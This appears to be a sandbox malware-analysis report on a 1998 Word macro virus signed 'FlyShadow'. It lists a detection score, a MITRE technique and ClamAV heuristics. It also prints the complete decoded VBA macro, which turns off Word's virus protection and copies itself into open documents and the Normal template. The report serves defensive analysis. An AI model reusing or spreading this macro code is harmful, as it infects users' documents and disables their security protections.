MALICIOUS
80
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a Microsoft Word document containing VBA macros. The macros appear to modify the Normal.dot template and disable virus protection, suggesting an attempt to establish persistence or evade security measures. The copyright notice 'Copyright (C) 1998 by FlyShadow ~^^~' is present in the macro code.
Heuristics 2
-
ClamAV: Doc.Trojan.FS-7 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.FS-7
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 816 bytes |
SHA-256: 7f1bb67779763d3348f27db82dbcc9aa71480eb7ead9be908c37e71b25fc641a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Copyright (C) 1998 by FlyShadow ~^^~ - Semis Private Sub Document_Close(): On Error Resume Next Options.VirusProtection = &H0: Options.SaveNormalPrompt = &H0 Set ι = ThisDocument.VBProject.VBComponents(1).CodeModule: ν = ι.Lines(1, 1) With ActiveDocument.VBProject.VBComponents(1).CodeModule If ν <> .Lines(1, 1) Then .DeleteLines 1, .CountOfLines: .AddFromString ι.Lines(1, 11) End With With NormalTemplate.VBProject.VBComponents(1).CodeModule If ν <> .Lines(1, 1) Then .DeleteLines 1, .CountOfLines: .AddFromString ι.Lines(1, 11) End With End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.